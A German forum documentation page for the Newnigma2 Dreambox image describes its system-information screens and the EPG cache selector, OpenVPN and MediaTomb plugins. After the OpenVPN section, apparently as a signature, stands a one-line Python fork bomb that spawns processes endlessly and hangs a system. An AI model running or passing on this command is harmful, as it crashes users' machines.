Pinned Newnigma2 Image - Dokumentation

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • System Informationen

      Das Image Information Center gibt Auskunft über den aktuellen Stand des Systems.
      Die Betriebsdauer seit dem letzten Neustart, Informationen über die Festplatte, sowie Hauptspeicher und Details vom momentan geladenen Kernel, dem Systemkern, etc.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC.jpg]

      * Harddisk – Gibt Informationen über die Festplatte aus
      * Memory – Gibt Informationen über den Hauptspeicher aus
      * Process – Gibt Informationen über die Prozesse aus
      * Kernel – Gibt Informationen über den Systemkern aus
      * Dmesg – Gibt Informationen über den Systemstart aus

      Harddisk ...

      Hier erfahren Sie alles Wissenswerte zu Ihrer Festplatte. Hersteller, sowie Produkttyp, Gesamtgröße und Temperatur. Außerdem ist es Ihnen möglich, über die grüne Taste die Festplatte sofort in den Standby-Modus zu versetzen.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC2.jpg]

      Memory ...

      In jedem Fall sind die Informationen zur Belegung des Hauptspeichers besonders wichtig. Hier wird der momentane Verbrauch dargestellt, Hauptspeicher und Swap-Speicher zusammengenommen. Zusätzlich gibt es noch die momentane Größe der Buffer, sowie des Cache.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC3.jpg]

      Prozess ...

      Zeigt die laufenden Prozesse der Dreambox an.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC4.jpg]

      Kernel ...

      Zeigt den laufenden Kernel der Dreambox an.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC5.jpg]

      Dmesg ...

      Wenn Sie genau wissen wollen, was bei dem Start Ihres Receivers eigentlich genau passiert, bekommen Sie hier alle Informationen, die Sie benötigen. Schritt für Schritt zeichnet das Menü den Startvorgang auf und gibt die Informationen wieder.

      [Blocked Image: http://pic.newnigma2.to/FAQ/IIC6.jpg]
    • EPG Cache Selector Plugin

      Enigma2 speichert das EPG Cache File per default unter /media/hdd
      Mit dem EPG Cache Selector könnt ihr den Pfad zum EPG File und dessen Dateiname festlegen
      Zum Beispiel könnt ihr die Datei auf einem USB-Stick oder einer CF-Karte speichern.
      Das hat unter anderem den Vorteil das bei einem Gui-Neustart nicht immer erst die Festplatte geweckt werden muss.
      Was zum einen den Neustart beschleunigt und zum anderen die Hardware schonen kann.

      Auf dem ausgewählten Gerät müssen 50MB an freien Speicherplatz vorhanden sein.

      [Blocked Image: http://pic.newnigma2.to/FAQ/epg.jpg]
    • [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn2.jpg]

      1.Autostart OpenVPN:
      OpenVPN wird in einem Runlevel beim booten gestartet oder wenn deaktiviert dort entfernt.

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn3.jpg]

      2.Generate Key/Cert:
      Hier kann man sich keys und Zertifikate generieren auch die configs dazu werden erstellt.

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn4.jpg]

      2.1 RSA Size:
      Verschlüsselungsstärke default 1024bit

      2.2 CA/Key Expire:
      Key/Zertifikat gültigkeit in Tagen.

      2.3 Country/State/Locality/Organization/Email Adress:
      Sollte selbsterklärend sein bzw schaut die default-Werte an.

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn5.jpg]

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn6.jpg]

      2.4 Server Name:
      Der Common Name vom OpenVPN Server der mit generiert wird.

      2.5 Clients:
      Anzahl der Clients:
      Achtung!!!
      Der Common Name eines jeden Client Zertifikates ist für den Server wichtig damit bekommen die Clients ihre IP vom Server zugewiesen.
      Hier ist es Box1,Box2.......also die Box<1 - Anzahl der Clients>

      2.6 Server IP Mask:
      Hier wird es bisschen komplizierter weil hier nur der ip Bereich angegeben wird.
      zbp 10.8.0.0 oder 10.78.88.0 oder 10.10.1.0 die 0 am ende ist wichtig der Server bekommt automatisch die 1 von OpenVPN.Das Plugin erstellt aber auch default configs für die einzelnen Clients dort ist dann der erste Client die 2 dann der nächste die 3 usw.Client Zertifikate und keys müsst ihr euch dann manuell auf die jeweiligen Geräte kopieren liegen in /etc/openvpn/easyrsa/keys.

      2.7 Server Netmask/VPN Port:
      Netzmaske des Servers und der VPN Port sollte klar sein.

      2.8 Client Remote Adress:
      Hier wird die Server Adresse eingegeben damit die Clients auch wissen wohin verbunden wird. z.b die dyndns Adresse.

      2.9 Machine Typ.
      Hier legt ihr fest ob die Box jetzt Client oder Server werden soll also falls ihr das Server Zertifikat auf ein NAS oder was auch immer installiert.

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn7.jpg]

      Einstellungen Sichern und Zertifikat installieren

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn8.jpg]

      [Blocked Image: http://pic.newnigma2.to/FAQ/openvpn9.jpg]
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • MediaTomb Plugin

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb.jpg]

      1.Autostart MediaTomb:
      MediaTomb wird in einem Runlevel beim booten gestartet oder wenn deaktiviert dort entfernt.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb2.jpg]

      2.MediaTomb Port:
      Hier kann man den Port für das MediaTomb WebInterface definieren.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb3.jpg]

      3.Database Verzeichnis:
      Hier kann man das Verzeichnis für die MediaTomb Datenbank definieren.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb4.jpg]

      4.Database Name:
      Hier kann man den Dateinamen der MediaTomb Datenbank definieren.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb5.jpg]



      5.MediaTomb Name:
      Hier kann man den Namen des MediaTomb Servers definieren.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb6.jpg]

      6.Netzwerk Gerät:
      Hier kann man das Netzwerk-Interface definieren auf dem der MediaTomb Server lauschen soll ( eth0, wlan0 usw)

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb7.jpg]

      7.Benutzername, Passwort:
      Hier kann man den Benutzernamen und das Passwort für das WebInterface festlegen.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb8.jpg]

      8.Das MediaTomb WebInterface:
      Hier kann man Verzeichnisse und Datei zur Datenbank hinzufügen.

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb9.jpg]

      9.Der Blick in die Datenbank:

      [Blocked Image: http://pic.newnigma2.to/FAQ/mtb10.jpg]